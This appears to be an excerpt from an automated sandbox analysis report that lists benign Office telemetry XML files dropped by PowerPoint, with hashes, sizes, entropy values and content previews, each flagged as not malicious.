                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSEwokoCAvQierSXFJjEQzDABHf2k+HyLXHaSMntiStNQLNO5AHNUlu:2dXwvHAvcrqvLYBHv+HiFf7
                                                                                                                              MD5:F79998F45A8CEE037D43757260AC87A8
                                                                                                                              SHA1:42BB3D4BE5F1955668A80E40C3A787C599C649F1
                                                                                                                              SHA-256:75A0472FE44DABD1C54A88A6A3690CDA768FEAAA10DBF1135B8833C18D565C7A
                                                                                                                              SHA-512:6E5C181F0F0E4DF64D1F3D3F31606E86C1D72F063A764A45D41475D4D74CEADEAC83B114AAC71AA020EC09A1AEAC649617A5815BDCF96AD4336BDE83B5C8702A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170086" V="2" DC="SM" EN="Office.Graphics.InkEffectsLoad" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="b0toe" />.. <A T="2" E="TelemetrySuspend" />.. <A T="3" E="TelemetryShutdown" />.. </S>.. <G>.. <S T="1">.. <F N="effectGUID" />.. </S>.. </G>.. <C T="G" I="0" O="false" N="InkEffect">.. <S T="1" F="effectGUID" />.. </C>.. <C T="U32" I="1" O="false" N="EffectCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="B" I="2" O="false" N="Highlighter">.. <S T="1" F="fHighlighter" />.. </C>.. <C T="U32" I="3" O="false" N="StrokeColor">.. <S T="1" F="strokeColor" />.. </C>.. <T>.. <S T="2" />.. <S T="3" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):842
                                                                                                                              Entropy (8bit):5.008606900129766
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSudkoCAvQierHkAsatNE8aPcqop9LDuM9oOWfrxxOOdkd3zN6NO2su:2dN2HAvcrHvlMofh9mFg2oDg
                                                                                                                              MD5:8B7A97E3953B343235574BF2E9C83B4B
                                                                                                                              SHA1:57D4386E489FF63CED3F69530DC1D5B5632413B3
                                                                                                                              SHA-256:9735939BD59A62B46B12F411FA3959386FEB041DA479B88D3C9A06A3744E66BA
                                                                                                                              SHA-512:E8FE7CC649B3BEC9570DC34BB9BCC3D206168009F9FC18B432504199635C29AC1518B05421BA33386532A13A3DA02171CDCF61AF657E6DC4740C8334BBD0ADEE
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170087" V="2" DC="SM" EN="Office.Graphics.SecondFailedIBitmap" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bi2pe" />.. </S>.. <C T="W" I="0" O="true" N="ErrorString">.. <S T="1" F="Error String" M="Ignore" />.. </C>.. <C T="U32" I="1" O="true" N="PixelWidth">.. <S T="1" F="Pixel width" M="Ignore" />.. </C>.. <C T="U32" I="2" O="true" N="PixelHeight">.. <S T="1" F="Pixel height" M="Ignore" />.. </C>.. <C T="D" I="3" O="true" N="DpiX">.. <S T="1" F="DpiX" M="Ignore" />.. </C>.. <C T="D" I="4" O="true" N="DpiY">.. <S T="1" F="DpiY" M="Ignore" />.. </C>.. <C T="W" I="5" O="true" N="Filetype">.. <S T="1" F="Filetype" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):821
                                                                                                                              Entropy (8bit):5.025216526423468
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdStT7LGANkoCAvQqAQ+Qf7iuXFJiQj9DaXOUd+McSxp5XHaSMNO5AHNUlu:2doyAGHAvVi+v5A/G207
                                                                                                                              MD5:5805CE220ED63F0A0EF2192FB897226F
                                                                                                                              SHA1:56403587C231FD0F0660730786B32A6CE846F11F
                                                                                                                              SHA-256:D4F580A7CC4ED69F47E969314E2A7B3ACC1EC4147A4F140D82334D53765E8E62
                                                                                                                              SHA-512:12720982CE37C4151E03D749416CD550A75B557AE392187B3AA13FD8BA0C23905CFC19BD72C9777A4EB032727ECE8F67D3103B3364E774D3612B5B3EF4CE6EF1
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170088" V="3" DC="SM" EN="Office.Graphics.ARCExceptions" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" SP="CriticalBusinessImpact" DL="B" DCa="DC" xmlns="">.. <S>.. <UCSS T="1" C="ARC Exception Telemetry" S="Assert Unexpected" />.. <A T="2" E="TelemetryShutdown" />.. <A T="3" E="TelemetrySuspend" />.. </S>.. <G>.. <S T="1">.. <F N="ULS_TagId" />.. </S>.. </G>.. <C T="W" I="0" O="false" N="TagID">.. <S T="1" F="ULS_TagId" />.. </C>.. <C T="I32" I="1" O="true" N="HResult">.. <S T="1" F="SH_ErrorCode" M="Ignore" />.. </C>.. <C T="U32" I="2" O="false" N="TagCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="2" />.. <S T="3" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):381
                                                                                                                              Entropy (8bit):5.250708539150798
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7mdFkxQdO4MIHb0c7oCDLChvRCUHperhTdClrCsHVlv//USwNOn2sby:TMHdS5OWIkoCAvQier9dqD1lfUdNO2su
                                                                                                                              MD5:9A7A9307E2EE4C834D86EF36D2F5E4CD
                                                                                                                              SHA1:6D5AC3013C17FCAB9E7E8CC24191A601115B2F5B
                                                                                                                              SHA-256:2DDEEE58D4D6549C9E28B893E7AEEE51380226C9CB5411931E15BC855E595435
                                                                                                                              SHA-512:F7DCCC3DF457960E521B9EE4B6BC2C0E4C3DF63D1698256A9FDC35BAA101A312CBF73AEF9EB968A06547290F471ADFF1A75C7EBC5336E135939F100DCCA815F3
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170089" V="1" DC="SM" EN="Office.Graphics.SetAdjustHandleFailed" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="b6uuo" />.. </S>.. <C T="I32" I="0" O="false" N="ShapeType">.. <S T="1" F="ULS_TagId" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1064
                                                                                                                              Entropy (8bit):4.9447351696321915
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSV4i1UkoCAvQiertq/EAdsDE6M9tN4AnwI/wnHDOUnn+E4ZnV7TdNhDxH901:2dgHAvcrtqc8J6bbqqi7TJDhCwSl
                                                                                                                              MD5:A36A06F8AF00FD36171950A9087842C0
                                                                                                                              SHA1:19A241BD6EF1BDB09ECF9EB311A5B6DC953179F0
                                                                                                                              SHA-256:6F0B7C52BD2935089956185DABDE3A31D66949846031B1BFC4065C8E59FDF26D
                                                                                                                              SHA-512:6D5F1B0E2CC5EAD06926C589D36699141588B1C5850D5524DD707AF852E375D6A37D11734DB942B8DA13D1FE3FE0413C92F010F51C48FDD5DE968E603A69F740
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170091" V="2" DC="SM" EN="Office.Graphics.EditorTrackerManager" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bd6oe" />.. </S>.. <C T="W" I="0" O="false" N="Exception">.. <S T="1" F="Exception" />.. </C>.. <C T="W" I="1" O="false" N="EditorTypeName">.. <S T="1" F="EditorTypeName" />.. </C>.. <C T="I32" I="2" O="false" N="Step">.. <S T="1" F="Step" />.. </C>.. <C T="B" I="3" O="false" N="Cancel">.. <S T="1" F="fCancel" />.. </C>.. <C T="B" I="4" O="false" N="Aborted">.. <S T="1" F="fAborted" />.. </C>.. <C T="B" I="5" O="false" N="KeepTrackingOnMouseUp">.. <S T="1" F="fKeepTrackingOnMouseUp" />.. </C>.. <C T="B" I="6" O="false" N="Dragging">.. <S T="1" F="fDragging" />.. </C>.. <C T="U32" I="7" O="false" N="Tag">.. <S T="1" F="Tag" />.. </C>.. <C T="W" I="8" O="true" N="TrackerTypeName">.. <S T="1" F="TrackerTypeNam
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):674
                                                                                                                              Entropy (8bit):5.042936927823301
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdS1UxIkoCAvQiery+iVthjcdLfNady9tSRdVYNEINO2su:2dKqHAvcry+cjg8p+z
                                                                                                                              MD5:D2032B73B1359AA42472D306637B64F0
                                                                                                                              SHA1:315F9128018823521346CF6FBEB3E968CBE3A306
                                                                                                                              SHA-256:4962325ABE814FD0518D5D1027403A0927FE3F8B3FA8610FE22D14B86D9736DC
                                                                                                                              SHA-512:279D5075B9CF571BA89A2F5E5C979BB3E0B6CF6BA0BF1247B8CAAB58B73BF831085C436BBBA285A02C4E4C9605B14705E366DC0A20E702C888C6CA210B5253AB
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170095" V="1" DC="SM" EN="Office.Graphics.DecorativeAltText" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="clezs" A="clp1n" />.. </S>.. <C T="B" I="0" O="true" N="Decorative">.. <S T="1" F="fDecorative" M="Ignore" />.. </C>.. <C T="W" I="1" O="true" N="ObjectName">.. <S T="1" F="ObjectName" M="Ignore" />.. </C>.. <C T="W" I="2" O="true" N="ObjectClass">.. <S T="1" F="ObjectClass" M="Ignore" />.. </C>.. <C T="W" I="3" O="true" N="Source">.. <S T="1" F="Source" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):385
                                                                                                                              Entropy (8bit):5.232298743887801
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7m64kYcAFb0c7oCDLChvRCUHperh8NJrzVlrcS5W9NOn2sby:TMHdSNIkoCAvQierCDz4SgNO2su
                                                                                                                              MD5:AFD98BCB9169D53F3CAB8E89D031DCA4
                                                                                                                              SHA1:6347FB3146CEDCD173E69383C0A0E4AA9A0E1232
                                                                                                                              SHA-256:20DE5E360A12988CD95AD1469397572D9965D1C8EEC0BDFDB4541E805A16F4E6
                                                                                                                              SHA-512:10FA4443E333815FE06980F701172BAAB42E69874D68B9A1904D6F6D64302D39E2719117505AAF60FD3D4C3EF4A6232309021815F44CBAE2182A893BF4B5F86D
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170096" V="1" DC="SM" EN="Office.Graphics.CallBackAborted" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="ayaco" />.. </S>.. <C T="U32" I="0" O="true" N="LastError">.. <S T="1" F="LastError" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):459
                                                                                                                              Entropy (8bit):5.163018688316438
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSPyUkoCAvQierRz4AEhndLukdoNO2su:2d9HAvcrWjd+
                                                                                                                              MD5:5797FB18CD112107BCEF88D9E034DF44
                                                                                                                              SHA1:AE8381010C4C3A140839FBF72EE3EE0F160F85D2
                                                                                                                              SHA-256:04D66BE119689BC57BD686AB3BEF57AF784145A0082E400CEB839414B673E456
                                                                                                                              SHA-512:2C8D6A9D6C0176E961A373EA793E4DA2E9A45D4BB3F7D43642ED2301188231562494FD4D56447019D0E97C36017DB716A559024F543B0ED467504F990BA8DC76
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170097" V="1" DC="SM" EN="Office.Graphics.FilterError" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="awzl6" />.. </S>.. <C T="I32" I="0" O="true" N="LRet">.. <S T="1" F="lRet" M="Ignore" />.. </C>.. <C T="W" I="1" O="true" N="KeyPath">.. <S T="1" F="KeyPath" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):427
                                                                                                                              Entropy (8bit):5.220784057366084
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBd7mr0kA4Yb0c7oCDLChvRCUHperhch+2nqUmvApx7IkUSwNOn2sby:TMHdSr7koCAvQierc/nqvA5UdNO2su
                                                                                                                              MD5:EBBFBFC8B647C2EE6C115AA89A24CF55
                                                                                                                              SHA1:F2B8BCB7947592326B05B3D082444F1BC146C001
                                                                                                                              SHA-256:8996246362ECA863035333079B41001FE4CE63F8739F82AC0E3EA22E9B4336FD
                                                                                                                              SHA-512:177131C44AFE8C90FBD5C8B7BF46EB276F09DA2A8E60DE2F8E845FD17CD42A8E381E5791EA361C8A69D29645AD5818B8FB7372370573FA5D23A6D254D270F04E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170098" V="2" DC="SM" EN="Office.Graphics.SVGExceptions" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="cn0zy" A="cn0z0 bo1g9 cn0z3 cn0z5 cn0z7 cn0z9 cn00b bo1ha bo1hb" />.. </S>.. <C T="TAG" I="0" O="false" N="TagID">.. <S T="1" F="ULS_TagId" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):972
                                                                                                                              Entropy (8bit):4.9717830381726476
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d30HAvfrBrFreFryVdr5AedezA97oMz3IJ:ckgvf9paFuVdkMLIJ
                                                                                                                              MD5:7B0DF3E4653B865412BA93009B0F012F
                                                                                                                              SHA1:30AAF88BAC2FAECE3CE7BA7EEDE49DAA2CA048B8
                                                                                                                              SHA-256:99C38F00F63CA6A660B1A66989450FB1C14AAFEACDB671157C6DB931A6B5D2A7
                                                                                                                              SHA-512:9AD6114DE198168FE605BEC34C6B63E491F53ABDE2FE019A9493084899D840A7A743DF84E11D650E822387CD1405E966A80E42E86871A12325620BEF0DF79128
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170099" V="2" DC="SM" EN="Office.Graphics.InsertMedia.Android" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="clog3" />.. <UTS T="2" Id="co8vc" />.. <UTS T="3" Id="cq8vw" />.. <UTS T="4" Id="bqp2g" />.. <UTS T="5" Id="cra8v" />.. <US T="6">.. <S T="5" />.. <S T="4" />.. <S T="3" />.. </US>.. </S>.. <C T="I8" I="0" O="false" N="RequestCode">.. <S T="1" F="RequestCode" />.. </C>.. <C T="I8" I="1" O="false" N="ResultCode">.. <S T="1" F="ResultCode" />.. </C>.. <C T="W" I="2" O="true" N="FailureReason">.. <S T="2" F="FailureReason" />.. </C>.. <C T="W" I="3" O="true" N="MediaFormat">.. <S T="2" F="ImageFormat" />.. </C>.. <C T="TAG" I="4" O="true" N="InsertMediaViaGalleryResult">.. <S T="6" F="ULS_Tag" />.. </C>.. <T>.. <S T="6" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):3951
                                                                                                                              Entropy (8bit):4.96713371845371
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:96:ag5NkwRDjRq9vRh3R2j++sZ+KGGsQ+0JoHJVsDJn+nJ6Ju:aggwRDjRq9vRh3R2C+swlGs/0JEJVsDG
                                                                                                                              MD5:CBF0E03FAD048D3B4DF205F1452427E0
                                                                                                                              SHA1:8A30B6D4D632AA4664FAEBFAE5D9602C17844EE3
                                                                                                                              SHA-256:4CB22D0E02FC97403A6A0DE28065CF60D5C3940D85ED1DC550C5CC89D8DD0C0C
                                                                                                                              SHA-512:5C9D4486B4556AE7EDC47D26F3FD8EFDF2AF629C4214BBAA8FD19B847377DF4A05417FD2D918F56120033CBD83A4F3E547FB82490A60067E66ED1BAAB91BAD1B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170103" V="1" DC="SM" EN="Office.Graphics.SVGErrorDetails" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="csp59" />.. </S>.. <C T="B" I="0" O="true" N="SVGEnabled">.. <S T="1" F="SVG enabled" M="Ignore" />.. </C>.. <C T="I32" I="1" O="true" N="Constructor">.. <S T="1" F="Constructor" M="Ignore" />.. </C>.. <C T="B" I="2" O="true" N="WasEverResetToOriginalImage">.. <S T="1" F="Was ever reset to original image" M="Ignore" />.. </C>.. <C T="B" I="3" O="true" N="Embedded">.. <S T="1" F="Embedded" M="Ignore" />.. </C>.. <C T="W" I="4" O="true" N="BlipEmbedRelID">.. <S T="1" F="Blip embed rel ID" M="Ignore" />.. </C>.. <C T="I32" I="5" O="true" N="BlipValidationCount">.. <S T="1" F="Blip validation count" M="Ignore" />.. </C>.. <C T="I32" I="6" O="true" N="BlipValidationHistory1">.. <S T="1" F="Blip validation history 1" M="Ignore"
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):520
                                                                                                                              Entropy (8bit):5.08129738073591
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSYti4koCAvQierDRpSXFJiQjFwcXHaSMNO5AHNUlu:2dztifHAvcrNpqv56c07
                                                                                                                              MD5:C06A45BE0BC2594B28A9CD32FE848085
                                                                                                                              SHA1:8698954D12D4B1D8D0EBD802DF9C9DD41D84576A
                                                                                                                              SHA-256:14446F18D4201A6B4406EE5E51AF48CA23F8F9CF9DD77F57A1ED28C7A3B590C7
                                                                                                                              SHA-512:E076145A0C550999E1F27304F63D70FAED7F11193101598A2799F9D6B07FAE402CB3EABFCB26875C97C7340A8B276E9E4307E432DF1C386ED8FBC21F7AA21EDE
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170104" V="1" DC="SM" EN="Office.Graphics.InkReplayInvokedByDevice" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bm46y" />.. <A T="2" E="TelemetryShutdown" />.. <A T="3" E="TelemetrySuspend" />.. </S>.. <C T="U32" I="0" O="false" N="EventCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="2" />.. <S T="3" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):595
                                                                                                                              Entropy (8bit):5.12679608720651
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSNY3qkoCAvQierrH9HPG1dmKu0ady9AUBNO2su:2dEAHAvcrpeCmH
                                                                                                                              MD5:A693E5D751C9F5EB97ECA56E9BA84FBB
                                                                                                                              SHA1:D4E29A58AAEC82BCA1D4CA214329AD4360189803
                                                                                                                              SHA-256:CFB4A733D84ECEE4A1DD2CD400B02946164CF85649FD05E61912A7BFF0AA13C4
                                                                                                                              SHA-512:CCEFECE0C3D685608C4190A3DB216730D9324220312DF5781407B61C9759F2C0E9D1A15B9493D4735DE0D756D2F6FAEB23B8F1A7AEB884EFA14FBAB21E31D765
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170105" V="3" DC="SM" EN="Office.Graphics.HrCreateProtectedTempFile" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="ctgbb" A="ctgbc" />.. </S>.. <C T="I64" I="0" O="true" N="ResultCode">.. <S T="1" F="ResultCode" M="Ignore" />.. </C>.. <C T="I64" I="1" O="true" N="TimeElapsed">.. <S T="1" F="Time Elapsed:" M="Ignore" />.. </C>.. <C T="W" I="2" O="true" N="TagID">.. <S T="1" F="ULS_TagId" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):388
                                                                                                                              Entropy (8bit):5.237791233136849
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSiqkNQzkoCAvQiertysSdOUDNO2su:2dxCgHAvcrtyTd/p
                                                                                                                              MD5:7BD3D8712610AA77111F20ED567C1DFD
                                                                                                                              SHA1:EEF4437E8A466600D2D358E0244B6DA340AE7941
                                                                                                                              SHA-256:24D1C79C5363954847D3495418EA4F30CB0EE8DC9612A7884A3A5EA58C8FDA5D
                                                                                                                              SHA-512:40EC5B2F8B4DDEDD16A83C9052225EA7B16C0D4895C4DEE9BA7F066DA671A5EA63799C6940CF874EB9D2700511D8023234D7E5DD628A99105C087D9D8B6696D2
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170106" V="2" DC="SM" EN="Office.Graphics.IcachedResourceKey" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="cu3ee" />.. </S>.. <C T="W" I="0" O="true" N="Callstack">.. <S T="1" F="ULS_Message" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):601
                                                                                                                              Entropy (8bit):5.008918737836408
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSYBrkoCAvQierXPXFJiQjF0OXHaSM+0XGNO5AHNUlu:2dhSHAvcrvv5GOag7
                                                                                                                              MD5:971BFC494DDE8C53988F167BEC264200
                                                                                                                              SHA1:F513F5178BBEF3F8FE65118BBBCCDA85D16B3F69
                                                                                                                              SHA-256:14AA0CD62D029C965E762507F0F2FED0EB6E32DA5D5D01BCB50C69E4C95F1B78
                                                                                                                              SHA-512:29F8327F20222D27F3748614B29E95D34BEEF68DE90A45E6123C184A41D3460E0D6F2C603AC3D888CA58D979B5E37B57615ECFD084799DF3F68A858CFBB577AD
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170107" V="1" DC="SM" EN="Office.Graphics.OartTextImeErrors" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="auhqr" />.. <A T="2" E="TelemetryShutdown" />.. <A T="3" E="TelemetrySuspend" />.. </S>.. <C T="U32" I="0" O="false" N="ErrorCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="I32" I="1" O="true" N="IMEFailure">.. <S T="1" F="hr" M="Ignore" />.. </C>.. <T>.. <S T="2" />.. <S T="3" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1023
                                                                                                                              Entropy (8bit):5.047932031129572
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSNciu7koCAvQier5fXFJiQjFHmXHaSMn+uNyant9BoavlInsN6nHxGV7d3S7:2dUci/HAvcrNv5tm5loiKm7
                                                                                                                              MD5:A2AF4593F7BC851C09001251684DEFE4
                                                                                                                              SHA1:78A0B33D12B8353C520E7769F7CF540A9E213080
                                                                                                                              SHA-256:3D237C04DDDDEBD5F118B95714722A18A6905C85072BD03EAD3B9B524AB1B687
                                                                                                                              SHA-512:071200D7F7BF8DF8954667B0BCD64B90D75F0B7D3C1DA68D3B9B5A9F174CD6E4B52AAC14F501EC8A6E1FC2F8ADCD719975F815919C6D95C50D1915F171256E2D
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="170110" V="0" DC="SM" EN="Office.Graphics.StylusUpView" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bjzqh" />.. <A T="2" E="TelemetryShutdown" />.. <A T="3" E="TelemetrySuspend" />.. </S>.. <C T="U32" I="0" O="false" N="StylusUpCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <C T="B" I="1" O="true" N="AnimationsPlaying">.. <S T="1" F="fAnimationsPlaying" M="Ignore" />.. </C>.. <C T="B" I="2" O="true" N="InitiatedFromSlideshow">.. <S T="1" F="fInitiatedFromSlideshow" M="Ignore" />.. </C>.. <C T="B" I="3" O="true" N="MixedDpi">.. <S T="1" F="fMixedDpi" M="Ignore" />.. </C>.. <C T="B" I="4" O="true" N="PacketCallBack">.. <S T="1" F="FPacketCallBack" M="Ignore" />.. </C>.. <C T="W" I="5" O="true" N="ViewName">.. <S T="1" F="ViewName" M="Ignore" />.. </C>.. <T>.. <S T="2" />.. <S T="3" />.. </T>.. <ST>.. <S T=
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):690
                                                                                                                              Entropy (8bit):5.005017077268136
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdSNa1koCAvQierhNXFJiQjFwcXHaSMYZSdy96LNO5AHNUlu:2dUlHAvcrrv56ccf7
                                                                                                                              MD5:41A998C28598972706C303BE8CAA91D4
                                                                                                                              SHA1:F2ABF7E6D5B2526CE206F26483B423E048967ADA
                                                                                                                              SHA-256:9465BADD7B0061D68D564E0AEB066C96428A5540DECEFED1915755698B50D4C2
